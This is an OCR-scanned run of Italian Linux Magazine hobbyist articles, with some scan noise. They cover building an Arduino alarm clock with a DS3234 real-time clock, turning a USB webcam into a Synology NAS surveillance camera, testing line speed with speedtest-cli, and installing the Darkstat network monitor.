sa, ma una misura precisa non è detto che sia accurata. 
Infatti, mentre un valore accurato fornisce valori molto 
vicini a quelli veri, un valore preciso fornisce valori 
molto vicini tra loro, ma non è detto che siano vicini al 
valore vero [cioè accurati!). Con riferimento al clock, si 
definisce drift una deriva dell'impulso associato a diver- 
si fenomeni {ad esempio, la temperatura) che determina 
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uno slittamento, avanti o indietro, del clock effettivo 
rispetto ad una condizione ideale. Definiamo come jitter 
la variazione, in ritardo o in anticipo rispetto a un clock 
ideale, dei fronti del segnale che originano chiaramente 
un ritardo o un anticipo dell'impulso. Fattori che cau- 
sano il jitter sono ilrumore termico, variazioni della 
tensione di alimentazione, interferenze, ecc. Infine, 
definiamo, poiché contenuto all'interno del DS3234, il 
TCXO, acronimo di Temperature Compensated Crystal 


 Oscillator: un circuito oscillatore al quarzo laddove le 


variazioni di temperatura, le quali inducono variazioni 
in alcuni parametri, sono compensate fornendo così una 
misura del tempo (e nel tempo] più stabile rispetto a 
soluzioni non compensate. 


all'interno di specifici registri che pertanto dovranno essere letti 
se si vuole visualizzarne il contenuto oppure scritti per impostare 
orario, datario e/o allarmi. In commercio di RTC per questo tipo 
di applicazioni ve ne sono diversi: in allegato, troviamo alcuni 
datasheet a cui far corrispondere le associate breakout board. 

La scelta è ricaduta sull'integrato DS3234 in package SOIC20 
(Small Outline Integrated Circuit da 20 pin) poiché tra quelli 
economici è il più accurato: +2ppm (parti per milione) a tempe- 
ratura ambiente. Questa elevata accuratezza è dovuta al fatto che 
non necessita di un quarzo esterno poiché è già presente nell'in- 
tegrato unitamente a un sensore - a cui è possibile accedere in 
tempo reale ai valori previo indirizzamento di uno specifico re- 
gistro - il quale periodicamente campiona la temperatura e regola 
il carico dell'oscillatore al fine di compensare la variazione dei 
diversi parametri. Gli indirizzi e i dati sono trasferiti attraverso 
l'uso del bus bidirezionale SPI (Serial Peripheral Interface). 

Il DS3234, come visibile nella tabella a pag. 12 del datasheet al- 
legato, presenta 23 registri da 8 bit. Ad ogni registro è associata 
una specifica funzione. Partendo dall'alto il registro numero 1 ha 
un range di valori da 0 a 59 e contiene il valore dei secondi: delle 
unità per i primi 4 bit a partire dal meno significativo (LSB - Le- 
ast Significant Bit) e delle decine di secondi per i successivi 3 
bit. L'indirizzo da utilizzare sarà, in esadecimale, il valore 0x00 
(o 00h) in lettura e 0x80 (o 80h) in scrittura. 

Analoghe considerazioni per tutti gli altri registri fermo restando 
il diverso range di valori e la specifica funzione da essi svolta. 
Com'è facile intuire, i valori non sono espressi in numeri decimali 
bensì in numeri binari con la particolarità che al singolo bit è as- 
sociato un peso, in sostanza il valore è codificato in BCD. 

Per leggere i registri dell'integrato, al fine di visualizzarli ad 
esempio su un display LCD, occorre effettuare la conversione da 
codice BCD a decimale. Viceversa, per scrivere nei registri (lad- 
dove permesso) ad esempio con l'intento di rimettere l'orologio, 
la sveglia o regolare il datario, se riportiamo i dati in decimale 
(com'è usuale) dovremo dapprima convertirli in BCD dal uC (mi- 


Connettore a si 


USB 


Sensore 
temperatura 


Bus 12C 


Bus SPI 


210||OH}UODO.IINN 
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® Fig. 1 * Schema di principio dell'orologio datario con sveglia 


CEE EI 
CODIFICA BCD 
Un codice “pesato” 


Acronimo di Binary Coded Decimal, la codifica nume- 
rica BCD è la rappresentazione di una cifra decimale 
con 4 bit. Il meno significativo {(LSB} ha un peso pari a 

1, ilsecondo 2, ilterzo 4 e il quarto 8. Allora, il numero 
17 in BCD è pari alla coppia di 4 bit 0001 e 0111 dove i 
primi 4 bit rappresentano le decine e i secondi le unità: 
rispettivamente, 1 e 7. In binario, è l'equivalente a 5 bit 
10001. Altro esempio, in BCD 81 dobbiamo vederlo come 
ilnumero decimale 8 e ilnumero decimale 1 quindi lo 
scriveremo come la coppia di 4 bit 1000 e 0001 mentre 
in binario utilizzeremo i 7 bit 1010001. Osserviamo come 
l'utilizzo del codice BCD presenti 6 cifre (disposizioni 
con ripetizioni dei valori0 e 1 su N posizioni) non utiliz- 
zate e per questo è detto codice ridondante. Per com- 
pletezza facciamo presente che esistono anche i codici 
Aiken, Gray ed Eccesso 3. 


crocontrollore) e solo dopo operare la scrittura del registro cor- 
rispondente. Per gli approfondimenti raccomandiamo la lettura 
dei commenti presenti nel sorgente laddove, al di là delle righe 
banali, viene spiegata puntualmente ogni singola azione. 

Per I'RTC DS3234 alcuni sviluppatori hanno elaborato delle libre- 
rie (in allegato) per Arduino che ben si adatterebbero al progetto, 
ma nel sorgente proposto faremo finta che queste non esistano: in 
questo modo potremo iniziare ad intuire anche come creare una 
libreria per un componente da implementare in nuovi progetti da 
sviluppare e rilasciare. Nel sorgente, probabilmente alcuni trove- 
ranno più agevole il trattamento dei dati utilizzando una struttura 
(istruzione struct): noi ci siamo mantenuti sul più intuitivo e fa- 
cile, ma i più bravi, possono riconvertirlo abbastanza facilmente. 


IL SENSORE 


Alla funzione orologio-sveglia con datario 
abbiamo aggiunto un sensore di temperatura. 
Niente e nessuno vieta di aggiungerne, seguen- 
do lo stesso iter, altri sul bus I2C poiché più 
semplice da gestire e dal punto di vista har- 
dware e dal punto di vista software, a patto 
che non si crei conflitto con gli indirizzi tra i 
device collegati. Nel prototipo visibile in Fig. 
2 il display presenta indirizzo 0x3F mentre il 
sensore, di default, 0x18 ma è possibile cam- 
biarlo intervenendo sui bit A2-A1-A0. In que- 
sto caso, per semplificare il sorgente abbiamo 
fatto uso delle librerie: la scelta è ricaduta sul 
chip MCP9808 (datasheet e librerie in allega- 
to) montato su una breakout board poiché pre- 
senta un package MSOP8 (Micro Small Out- 
line Package a 8 pin) assolutamente ingestibile 
su breadboard. 
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® Fig. 2 è Primo prototipo in funzione: 
impostazione dell'orario 


CABLIAMO IL CIRCUITO 


Per le prime prove, soprattutto se intendiamo modificarne il fun- 
zionamento e/o variarne il numero di funzioni, possiamo fare uso 
di breadboard con corrispondenti breakout board le quali dovran- 
no avere i reofori (connettori lineari o angolari) per l'inserzione 
su breadboard. Solo in un secondo momento, per miniaturizzare 
il risultato, inserirlo in un mobiletto plastico e renderlo definitivo 
e stabilmente in uso, si può realizzare un circuito stampato creato 
ad-hoc da far realizzare da ditte specializzate nella creazione di 
PCB. Per i pulsanti sono state adottate delle resistenze di pull- 
down: mantengono l'ingresso del uC ad un livello logico basso. 
Poiché all'interno del uC sono già presenti delle resistenze di pull- 
up (mantengono lo stato del pin al livello alto) allora, modificando 
il sorgente e le connessioni, possiamo rimuovere anche le 4 resi- 
stenze. In questi casi, nel modificare lo schema, si presti attenzio- 
ne a non creare dei corto-circuiti nel pigiare il pulsante poiché si 
rischia di distruggere la porta digitale del uC! 


TRASFERIAMO I DATI 


Poiché stiamo utilizzando il bus SPI per I'RTC (ma chi vuole può 
utilizzare il bus I2C scegliendo un diverso RTC e modificando 
il sorgente) e la programmazione del uC utilizzando l'IDE Ar- 


duino come ISP fa uso proprio del bus SPI, per evitare conflitti 
potremmo adottare una soluzione dedicata: utilizzo di uno speci- 
fico circuito integrato possibilmente supportato dal kernel Linux. 
Durante i nostri test, abbiamo optato per una breakout board con 
FT232RL supportato dal modulo ftdi_sio (modinfo ftdi_sio). 
Qualora si scegliesse un modello differente è necessario assicu- 
rarsi che sia supportato direttamente dal kernel o da sorgenti di 
terze parti non abbandonati nello sviluppo! Si può adottare anche 
la soluzione presente sulla scheda Arduino Uno: un connettore 
per la programmazione seriale collegato al bus SPI. In questo 
modo possiamo continuare ad utilizzare la scheda Arduino come 
programmatore seriale. Il collegamento vede l'ISP direttamente 
ai pin del pC e sulle linee MISO, MOSI e SCK tra I'RTC e il pC 
dovranno essere poste 3 resistenze in serie secondo lo schema di 
pag. 3 riportato nel documento allegato (AVR910.pdf). Analoghe 
considerazioni per i pin 2 e 3 del uC, corrispondenti ai pin digitali 
0 e 1 di Arduino Uno: se vogliamo utilizzarli come ingressi/uscite 
ricordiamoci di inserire 2 resistenze in serie alla linee RX e TX 
tra i pin del pC e il convertitore USB-Seriale. 


L'ALIMENTAZIONE 


In genere, non vi sono problemi di alimentazione con l'uso delle bre- 
akout board poiché sono garantite per un range di tensioni comprese 
tra i 2,7 Vei 5,5 V e quindi idonee per l'alimentazione via USB, 
ma una verifica sul datasheet del costruttore può sempre evitarci 
spiacevoli inconvenienti. Effettuata la verifica durante le prove di 
programmazione possiamo tranquillamente alimentare il sistema da 
porta USB poiché l'assorbimento di corrente, utilizzando un display 
LCD, rimane piuttosto contenuto. Ma se volessimo rendere “indi- 
pendente” la scheda? Alla lista della spesa occorre aggiungere un 
integrato stabilizzatore 1A7805 e un paio di condensatori. Lo sche- 
ma elettrico allegato fornirà tutti i dettagli del caso. 


COME FUNZIONA? si 


Pigiando il pulsante Invio si attiva l'allarme, evidenziato con una 
campanella stilizzata. Per entrare nel menu generale occorre pigiare 
il pulsante Imposta e per muoversi nelle diverse voci premeremo i 
pulsanti Avanti o Indietro: mantenendo pigiati questi due pulsanti 
si otterrà la selezione/regolazione veloce, circa 4 al secondo. Tra le 
voci è presente anche Ritorna che dice semplicemente di ritornare. 
alla vista orario con scritte scorrevoli senza entrare in uno degli 
altri sotto-menu: quelli disponibili possiamo vederli coma una sorta 


LA LISTA DELLA SPESA 


Ecco tutto ciò che ci serve per sviluppare il progetto 


Oltre al PC con caricato ilbootloadere il quarzo con la 
coppia di condensatori, necessitiamo di 4 pulsanti N.A. 
{Normalmente Aperti] da poter inserire su una breadbo- 
ard, 4 resistenze da 10k9Q, una breakout board con l'in- 
tegrato DS3234 e un sensore ditemperatura MCP9808 e 
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una seconda breakout board con l'integrato FT232RL per 
la conversione USB-Seriale con corrispondente cavo per 
il collegamento al PC/portatile. Optando per altre brea- 
kout board si dovrà modificare in maniera congruente il 
sorgente e sarebbe inutile caricare quello allegato. 


File Modifica Visualizza Inserisci Preferenze Strumenti Aiuto 


Bal 


9 


ai i cibi 


Tudke 
Lt? 
RETCIECEO À 
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| Riferimento Simbolo di alimentazione Componente Libreria Impronta 
*PWR? VEC VEC 


power __<Sconosciuto> 


File /run/media/micha/0D31-218D/Arduino Custom 3/0rologioDatarioSveglia/Allegati... Z 0,85 


Descrizione 


X201,93 Y137,16. 


Parole chiave 
POWER, PWR 


dx 201,93 dy137,16 dist 244,11 


® Fig. 3 * Schema elettrico del primo prototipo realizzato con il software KiCAD 


di buffer circolare nei quali una volta giunti al termine si riprende 
con la voce successiva rientrando dalla testa o dalla coda a secon- 
da di dove si è giunti. Entrati nel menu generale, accediamo in un 
sotto-menu pigiando il pulsante Invio: spostiamoci sul valore da 
regolare con i pulsanti Avanti/Indietro, quindi premiamo Imposta 
e, con i pulsanti Avanti/Indietro, modifichiamo il valore. Regolato 
quest'ultimo, premiamo Invio: apparirà la scritta Valore accettato 
e si ritornerà al passo precedente. Stesso iter per minuti e secondi. 
AI termine pigiamo Invio per impostare il nuovo orario/allarme re- 
golato. Medesima dinamica per allarme e datario. Lo schema elet- 
trico (Fig. 3) è stato realizzato con il software KiCAD in versione 
4.0.2 (Attp://kicad-pcb.org/) presente nei repository di tutte le di- 
stribuzioni, ma nessuno vieta l'utilizzo di Fritzing (Attp://fritzing. 
org) affrontato nel numero 166 (Marzo/Aprile 2016) di Linux Ma- 
gazine. Nella versione definitiva è stata implementata una funzione 
di fading: un LED aumenterà la propria luminosità all'aumentare 
della luce che colpisce una fotoresistenza. Come applicazione si po- 
trebbe pensare alla retroilluminazione di display LCD se i termina- 
le del LED di quest'ultimo sono disponibili esternamente: nel nostro 
caso non è stato possibile. Inoltre, avendo un sensore di temperatura 
è possibile aggiungere la funzione termostato. Va da sé che in questi 
casi necessitiamo di un'elettronica aggiuntiva per dare il comando 
a un dispositivo di potenza. Ricordiamoci sempre di verificare la 
corrente assorbita dai pin digitali del uC poiché essi non permetto- 
no una corrente superiore ai 20mA pena la bruciatura della porta. 
Infine, in luogo dei pulsanti si può pensare di utilizzare un encoder 
con pulsante incorporato: ad esempio, un economico ENC130175F- 
12PS (datasheet allegato). Come al solito per qualsiasi domanda 
o dubbio possiamo fare riferimento al forum di Linux Magazine 
(www.linux-magazine.it/forum/). 


1 MODI SPIO - 
Due cifre per identificarli 


I modi di comunicazione possibili attraverso itbus SPI 
sono 4. Il dispositivo master li supporta tutti alfine dì — 
adattarsi allo slave che normalmente ne supporta 10 

al massimo 2: ad esempio, it DS3234 supporta il modo 
1e 3. Maa cosa si riferiscono questi modi? Per com-_ 
prenderlo definiamo i parametri CPOL {Clock POLarity) 

e CPHA {Clock PHAse] i quali assumono valore 0 0 1. 

Il parametro CPOL definisce lo stato di riposo della — 
linea di clock quando non attiva: se CPOL=0 l'idle è il 
livello logico basso, è livello logico alto se CPOL=1.IL 
parametro CPHA indica il fronte (salita o discesa) det 
clock in cui viene campionato il dato. In funzione dei — 
valori assunti da questi due parametri restano definiti 

4 modi: modo 0 (CPOL=0 e CPHA=0}, modo 1(CPOL=0e 
CPHA=1)], modo 2 (CPOL=1 e CPHA=0) e modo 3 [CPOL=1 
e CPHA=1). Ad esempio, nel modo 1, supportato dal _— 
DS3234, il master attiva prima la linea Slave Select, — 
quindi la linea del clock. Il fronte di salita dell'impulso — 
di clock è utilizzato per preparare i dati sulle linee MISO 
e MOSI le quali devono essere stabili quando la linea di 
clock è bassa e possono essere cambiate quando è alta. 
A questo punto, il dato viene campionato dal master e 
dallo slave durante la transizione da alto a basso della 
linea di clock. Questo ciclo si ripeterà per ogni bit tra- 
sferito sul bus. = > 
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casalingo è necessario togliere di tasca centinaia se non migliaia 
di euro? Per fortuna, la tecnologia va avanti e sono abbastanza 
lontani i tempi in cui era necessario dotarsi di sofisticati sistemi studiati 


(- l'ha detto che per realizzare un sistema di videosorveglianza 


VIDEO 
SORVEGLIANZA 
LOW GOST 


Se hai un NAS Synology, ti basta una semplice 
webcam. Ecco come fare 


Il software completo lo trovi su: www.edmaster.it/url/5701 


ad-hoc e dal costo decisamente proibitivo. Oggigiorno, infatti, è pos- 
sibile trovare in commercio differenti modelli di IP Webcam, speciali 
occhi digitali in grado di registrare ogni piccolo spostamento rilevato. 
Nonostante ciò, questi “nuovi” gadget tecnologici potrebbero risultare 


Installiamo la Webcam sul NAS 


Ecco come far riconoscere ad un modello Synology una comune webcam USB 


Pe cerca Impostazioni 


1 Generale —Beta = Aggiornamentiautomatici | Pacchetti sorgente Certificato È 

® installato È 
Notifica = 

© Aggiorna Verrà inviata una e-mail 0 una notifica sul desktop alla disponibilità di nuovi aggiornamenti. È 
Esplora Abilita notifica e-mail È 
7 Abilita notifica desktop È 

ag Consigliato È 


Livello di fiducia 


IL CENTRO PACCHETTI 
01 Colleghiamo la webcam USB al NAS. Successiva- 
mente, accediamo alla pagina di gestione del NAS e 
apriamo il Centro Pacchetti. Clicchiamo Impostazioni e spun- 
tiamo la voce Qualsiasi editore. 


ESTESA int 


USB Webcam 


E 

Descrizione : È 

© Aggiorna p USB Webcam driver package 5.2-30 E 
Esplora adi È 
È 

ad Consigliato - = 
Azione E 

on Stop E 
25 Tutto E 
Disinstatia = 

È 


E] Backup 


AVVIAMO IL DRIVER 
03 AL termine del setup, nella lista dei SW installati 
comparirà USB Webcam. Avviamolo: dalla pagina 
dei dettagli e dal menu a tendina presente, scegliamo la voce 
Lancia e attendiamo che venga avviato. 
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anstatazione manuare 


© Aggiorna — 
ro Carica un pacchetto 
Seleziona un file. i 
ufg Consigliato 
è 


Li] 
na Tutto Alle: usb_webcam-S.2-30ARMXP.spk | Sfoglia 
E] Backup \ 


@ Multimedia 


i 
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SW DI TERZE PARTI 
02 Torniamo al Centro Pacchetti e clicchiamo su 
Installazione manuale. Premiamo Sfoglia e sce- 
gliamo il file .spk corrispondente alla nostra piattaforma — 
(www.edmaster.it/url/5701) e proseguiamo con Avanti. 


mne titnat 


IMPOSTAZIONI VIDEO 

Nel menu Applicazioni clicchiamo sulla nuova icona 

USB Webcam. Si apre una pagina di configurazio- 
ne: scegliamo risoluzione, fps, porta, username e password. 
Spuntiamo Force YUV e salviamo le modifiche. 


La procedura di installazione è molto semplice: 

cerchiamo Surveillance Station nel Centro pac- 
chetti e clicchiamo sul pulsante Installa. Fatto ciò, non do- 
vremo far altro che attendere qualche minuto (necessario 
per il'download del software). 


Informazioni 


Nome 
Indinzzo 1P 
Porta 
Marca 


Formato video 


° © Indichiamo il nome della webcam, compiliamo IP 
con 127.0.0.1, Porta con 8080 [o quella fornita in 
precedenza), Formato video con MJPEG, e Percorso d’ori- 
gine con /?action=stream. Verifichiamo la configurazione 
con Test connessione. 
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Per visionare la webcam da remoto occorre aprire 

la giusta porta del router. L'operazione varia a se- 
conda del modello in proprio possesso, ma generalmente si 
trova sotto la voce Port Forwarding o NAT. Apriamo la porta 
8080 e quella del NAS, di solito la 5000. 


ab 


Configurazione 


Selezionare una 
modalità di 
configurazione: 


Configurazione rapida 


Configurazione completa 


Avviamo Surveillance Station. Apparire quindi una 

pagina web con un'interfaccia del tutto simile a 
quella del DSM. Clicchiamo su Menu e scegliamo Telecamera 
IP. Confermiamo prima con Aggiungi e successivamente con 
Configurazione rapida. 


L'inquadratura ripresa dalla webcam è ora visio- 
nabile in streaming solo sulla rete locale (per ora): 
ci basta cliccare su Veduta dal Vivo (in Surveillance Station) o 
puntare il browser che preferiamo all'indirizzo http://indiriz- 
zo_ip:8080/?action=stream. 


Pe QuickConnect 
Saona Mia Nota: Le impostazioni su questa pagina non possono essere modificate, in quanto si è attualri. 
mediante QuickConnect. È 

Cartella condivisa È 
QuickConnect facilita Il collegamento alla DiskStation da qualsiasi posto. Basta abilitare Quick 


- registrare un account Synology. 
| Servizi file È 
Y Abilitare QuickConnect i 
cene I a 
Ora dare alla DiskStation un ID QuickConnect. Crealo semplice da ricorcare in modo che È 
Gruppo possiate collegarvi da qualsiasi posto con qualsiasi dispositivo. i 
QuickConnect ID: È 
| Dominio/LDAP È 
Creare automaticamente regole di inoltro porta È 
Connettività Avanzate i 


Apriamo il Pannello di controllo del NAS, raggiun- 

giamo la voce QuickConnect e verifichiamo che sia 
abilitato (così da poter accedere da remoto tramite un do- 
minio a nostra scelta). Da remoto, raggiungiamo l'indirizzo 
http://quickconnect.to/nome_utente. 


coeso 
seceè 
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Tu ti muovi, lui registra 


Motion detection, notifiche e streaming: rendiamo più professionale il sistema di videosorveglianza 


Un sistema di sorveglianza che si rispetti deve 

avvisarci se ci sono movimenti sospetti. Apriamo 
Regola Azione dal menu di Surveillance Station e clicchiamo 
su Aggiungi. Scegliamo un nome per la nuova azione, da Tipo 
di regola selezioniamo Programmato. 


Pianifica 


Settiamo gli orari in cui il rilevamento deve es- 

sere attivo. Selezioniamo lo strumento gomma 
e cancelliamo tutti i quadratini: questi ultimi rappresenta- 
no le fasce orarie e i giorni della settimana. Selezioniamo 
quindi solo quelli di nostro interesse. 


Spostiamoci nel tab Impostazioni e selezioniamo 

quali messaggi vogliamo ci vengano recapitati: il 
rilevamento del movimento e la manomissione. Ma può anche 
essere utile essere informati di un errore nella registrazione 
o sulla perdita di connessione con la webcam. 


La schermata successiva richiede la sorgente 

dell'evento (la nostra Webcam USB, ovviamente). Dal 
menu a tendina Evento selezioniamo la voce Movimento rilevato. 
Impostiamo poi un Intervallo a nostra scelta (10 secondi dovreb- 
bero essere sufficienti). 


Da Surveillance Station clicchiamo Notifica e selezio- 

niamo Abilita Notifiche Email. Inseriamo i parametri 
di accesso del nostro account di posta elettronica: per Gmail in- 
seriamo l'indirizzo, la password, porta 465, e compiliamo SMTP 
con smtp.gmail.com. 


Infine, selezioniamo il messaggio di rilevamento mo- 

vimento e, con un clic destro del mouse, scegliamo 
Modifica. In Messaggio modifichiamo il testo come più ci aggra- 
da. Quello predefinito ci invia anche un'istantanea di ciò che ha 
causato la registrazione. 
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costosi, almeno per quella fascia di utenti che non è disposta a mettere 
mano al portafogli. Il metodo che proponiamo semplifica di molto la 
vita di chi è già in possesso di un NAS, ovvero di un dispositivo di cen- 
tralizzazione dei dati all'interno di una rete locale. Qualora fossimo in 
possesso di un modello prodotto da Synology, potremo trasformare una 
banale webcam in una telecamera pronta a scrutare ogni anomalia. Con 
un certo grado di sicurezza, possiamo affermare che la maggior parte 
dei modelli prodotti da Logitech, ad esempio, sono adatte al nostro sco- 
po. Unico requisito: il nostro NAS Synology deve essere equipaggiato 
almeno con la release 5.2-5644 Update 5 del DSM (il sistema operativo). 


I LIMITI DI QUESTO SISTEMA 


Come già detto, il driver non gestisce tutte le webcam presenti sul 
mercato e non garantisce la corretta gestione della risoluzione o il 
massimo dei frame messi a disposizione dalla webcam utilizzata. 
Molte IP cam sono dotate di led infrarossi per la visione al buio, cosa 
di cui la maggior parte delle webcam sono sprovviste. Inoltre, nono- 
stante si possa disattivare la webcam da Surveillance Station, il LED 
di alimentazione della webcam usata durante il nostro test è rimasto 


Apriamo l'app Telecamera IP di Surveillance Station e, 

con un clic destro sul nome della webcam, scegliamo 
Modifica. Spostiamoci in Impostazioni Registrazione e selezionia- 
mo Salva il video ogni 30 minuti. 


Dove vanno a finire tutte le foto dei movimenti rilevati? 

Apriamo l'app Istantanea e scarichiamole sul PC che 
stiamo utilizzando: per farlo, clicchiamo sul pulsante Scarica (pre- 
sente in alto a destra della finestra). 


QUALE FILE SPK USARE? 
Sono disponibili per (quasi) tutte le architetture 


Per installare l'SPK corretto basta conoscere l'architettura del 
NAS. | sistemi Synology sono basati su differenti architetture, 
ma i modelli più diffusi sono generalmente x86_64, ARM e 1686. | 
NAS nati dal 2014 in poi sono generalmente ARM7, mentre quelli 
precedenti ARMS. Quasi tutti i NAS di fascia alta Synology sono 
x86_64 e soltanto il DS214Play e DS415Play sono i686. Per una 
lista completa, possiamo fare riferimento al forum di supporto 
Synology disponibile alla pagina www.edmaster.it/url/5702. 


attivo. Pertanto, la webcam, anche se non viene gestita e non trasmette 
nulla in streaming, rimane accesa consumando energia elettrica: un 
consumo irrisorio sì, ma comunque esistente! Questi limiti vengono 
però offuscati dai numerosi pregi quali la facilità di configurazione e 
il riutilizzo di hardware già disponibile che abbatte i costi rendendoli 
praticamente pari a zero. 


Scegliamo Limita archivio della cartella a 10 GB: il 

sistema si preoccuperà di cancellare le registrazioni 
meno recenti una volta saturato lo spazio. Possiamo anche man- 
tenere i file soltanto per un numero stabilito di giorni. 


Cameras 


USB_webcam 


127.0.0.1 


Esiste anche un’app per Android. Il suo nome è DS 

Cam ed è scaricabile dal Play Store. Inseriamo l'ID 
QuickConnect e i dati di accesso: vedremo la nostra live cam. Pos- 
siamo consultare le registrazioni già effettuate. 


eoseo 
veso 
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QUANT'È 
VELOCE LA TUA 
CONNESSIONE? 


Vuoi testare le prestazioni della tua ADSL o del tuo 
VPS? Ecco come farlo direttamente dal terminale 


Mag 2 


uante volte ci è capitato di voler testare la velocità della nostra con- 
nessione a Internet? Di servizi che ci permettono di farlo ce ne sono a 
bizzeffe. Ma oggi scopriremo un metodo più raffinato per verificare le 


tamente dal terminale. Il software in questione si chiama speedtest-cli e non è 
altro che un'interfaccia a riga di comando che ci permette di utilizzare gli stessi 
server di Speedtest.net. Un tool che si dimostra molto utile anche per verificare 


prestazioni della propria ADSL/VDSL: un tool che ci permette di farlo diret- 


le prestazioni di rete di un VPS sul quale abbiamo hostato un nuovo sito Web. 


Il primo test da terminale 


Python Pip ci aiuterà ad installare e mantenere aggiornato speedtest-cli 


Prima di tutto installiamo Python Pip, necessario per 

l'installazione di speedtest-cli. Per fare ciò, lanciamo 
sudo apt-get update per aggiornare l'elenco dei pacchetti e, al ter- 
mine, digitiamo sudo apt-get install python-pip seguito da Invio. 


o root@valeria-ubuntu: /home/mario 


Qualora in futuro volessimo aggiornare il tool ad una 

release più recente, ci basterà lanciare sudo pip install 
speedtest-cli --upgrade: il sistema verificherà automaticamente 
la disponibilità degli aggiornamenti e provvederà ad applicarli. 
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root@valeria-ubuntu: /home/mario 


urllib3 non precedentemente selezionato. 
thon-urllib3_1.11-1 all.deb... 


non cgerzn temente selezionato. 

rativi per estrarre .8-3_all.deb... 
razione di python-requ 
il pacchetto 

vi per estrarre . 

one di python-setupt 

fonato 


PERERITE non precedentemente selezionato. 
thon-setuptools_18.4-1_all.deb... 
(18.4-1)... 

il pacchetto python-pip non precedentemente selezionato. 


Dopo aver installato Python PIP possiamo quindi proce- 

dere all’installazione di speedtest-cli: ci basta lanciare 
il comando sudo pip install speedtest-cli ed attendere che il down- 
load con successiva installazione venga portato a termine. 


o root@valeria-ubuntu: /home/mario 


Estrazione di python-wheel (0.26.0-1)... 

Elaborazione dei trigger per man-db (2.7.4-1)... 
Configurazione di python-colorama (0.3.3-1)... 

di python-distlib (0.2.1-1)... 

di python-ndg-httpsclient (0.4.0-1)... 
di python-urllib3 (1.11-1)... 

di python-requests (2.7.0-3)... 


Configurazione 
Configurazione 
Configurazione 
Configurazione 


Ora che abbiamo installato tutto il necessario, testare 
la linea è un gioco da ragazzi! Lanciamo da terminale 
il comando speedtest-cli: il software si preoccuperà di cercare il 
server più adatto e avvierà il test mostrando il risultato altermine. 


OSO root@valeria-ubuntu: /home/mario 


rootevaleria-ubuntu:/home/mario# speedtest-cli 

Retrieving speedtest.net configurati 

Retrieving speedtest.net server list. 

Testing from Telecom Italia (79.45.2.199)... 

Selecting best server based on latency... 

osted by WiGate S.r.l. (Reggio Calabria) [114.36 km]: 44.658 ms 


Testing download speed.. 

Download: 8.61 Mbyte/s 

Testing upload speed 

Upload: 0.35 Mbyte/s 
root@valeria-ubuntu:/hone/mario# E 


Ilrisultato deltest standard è espresso in Mbit/s. Ma 

speedtest-cli consente anche di averlo in Mbyte/s. 
Se preferiamo quest'ultima visualizzazione, lanciamo un test 
con l'opzione --bytes: speedtest-cli --bytes. Ed ecco apparire 
la velocità espressa in un'unità più comprensibile. 


© root@valeria-ubuntu: /home/mario 


root@valeria-ubuntu:/home/mario# speedtest-cli --sil 


Ping: 46.064 ms 

Download: 6.33 Mbit/s 

Upload: 2.83 Mbit/s 
root@valeria-ubuntu:/home/mario# 


Se non fossimo interessati al nome del server e a 

tutti gli altri parametri ma volessimo testare sol- 
tanto il ping, la banda di download e quella di upload della 
linea basterà aggiungere --simple al comando speedtest- 
cli. Lanciamo dunque speedtest-cli --simple. 


OE root@mario-Desktop: - 
root@mario sktop:-# speedtest-cli --server 7839 
Retrieving speedtest.net configuration... 
Retrieving speedtest.net server list... 


esting from Telecom Italia (79.45.2.199)... 


osted by Fastweb SpA (Milan) [924.65 km]: 43.188 ms 
esting download speed 

Download: 3.98 Mbit/s 

esting upload speed 


Dopo aver scelto il server, possiamo lanciare il 

test di velocità della linea su di esso. Lanciamo il 
comando speedtest-cli --server id-server, dove id-server è il 
numero identificativo del server di test che abbiamo scelto al 
passo precedente. 


root@valeriaubuntu: /home/mario 


Vogliamo condividere i risultati ottenuti con i no- 

stri amici? Il comando speedtest-cli--share creerà 
un'immagine riepilogativa e ci fornirà un link consentirne la 
consultazione a chiunque ne sia in possesso (inviamolo via mail 
o pubblichiamolo sui social network). 


o root @mario-Desktop: - 


Può capitare che un server sia sovraccarico. Per Sce- 

glierne un altro basterà consultare la lista ordinata 
per distanza dalla nostra posizione attuale. Lanciamo il comando 
speedtest-cli --list | grep -i Italy e consultiamo i server disponi- 
bili nel nostro Paese. 


root &mario-Desktop: - 
paditficate È 


Con il comando crontab -e e inserendo la stringa 30 10 

*** /usr/local/bin/speedtest-cli » /home/username/ 
speedlog.txt, ad esempio, ogni giorno alle ore 10:30 verrà lanciato 
un test della connessione e il risultato verrà salvato automatica- 
mente all'interno del file speedlog.txt. 
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no essere necessari monitoraggi continui. Per fortuna, però, esi- 
stono numerosi software atti a svolgere operazioni di monitoring 
che facilitano (e non di poco!) la vita dei professionisti IT. Uno di que- 
sti è Darkstat, un software in grado di operare in modo silente e offrire 
un'interfaccia web per la consultazione dei dati raccolti. Il software 


[ l làvoro di un sistemista può essere faticoso, impegnativo e posso- 


IL LATO OSCURO. 
DELLA TUA LAN 


Darkstat è un tool semplice e leggero 

che si muove silenziosamente nella tua rete locale 
e monitora ogni singolo pacchetto in transito. 
Ecco come funziona 


Mario Bonofiglio 


consente di monitorare e quantificare il traffico generato sulla rete dai 
vari host connessi, i protocolli usati e la velocità media e massima 
offerta dalla rete durante intervalli di tempo più o meno lunghi. Per 
i nostri test, abbiamo deciso di installare Darkstat su una macchina 
della nostra rete locale configurando poi anche un accesso da remoto. 
Scopriamo dunque quali sono le potenzialità nascoste di questo tool. 


Installiamo tutto il necessario 


Scarichiamo e compiliamo Darkstat: bastano solo pochi minuti! 


Raggiungiamo la pagina Web https://unix4lyfe. 
org/darkstat/ e scarichiamo l'ultima release di- 
sponibile di Darkstat. Estraiamo l'archivio: avviamo il termi- 
nale e lanciamo il comando tar jxvf darkstat-3.0.719.tar.bz2. 


Lanciamo cd /home/username/Scaricati/dar- 

kstat-3.0.719 seguito da ./configure. Al termine, 

lanciamo dapprima il comando make e successivamente 
sudo make install. 
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Installiamo le librerie che ci serviranno per la 

compilazione del codice sorgente. Per fare ciò, 
sempre da terminale, lanciamo il comando sudo apt-get 
install zlibl1g-dev libpcap-dev. 


Ora che il software è installato, avviamo il monitoraggio 

della LAN con sudo darkstat -i wlan0 (dove wlan0 
è la scheda da utilizzare). Per conoscere le interfacce disponibili 
lanciamo il comando ifconfig. 


La tua rete la sorvegli così! 


Grazie all'interfaccia web accessibile anche da remoto, analizzare i dati è un gioco da ragazzi 


ng for 1 min, 0 secs, since 2016-03-30 22:55:46 CEST+0200. 
132 bytes, in 116 packets. (144 captured, 0 dropped) 


IPMPITRTTAI 


UCI Rava: max Ta 
gut a min: 0,0 KB/s, avg: 0.0 KB/s, max: 0.1 KB/s 


last 60 minutes 


m IIC] CIULLI n 
In 0.1 KB/s, avg: 0.1 KB/s, max: 1.5 KB/s 
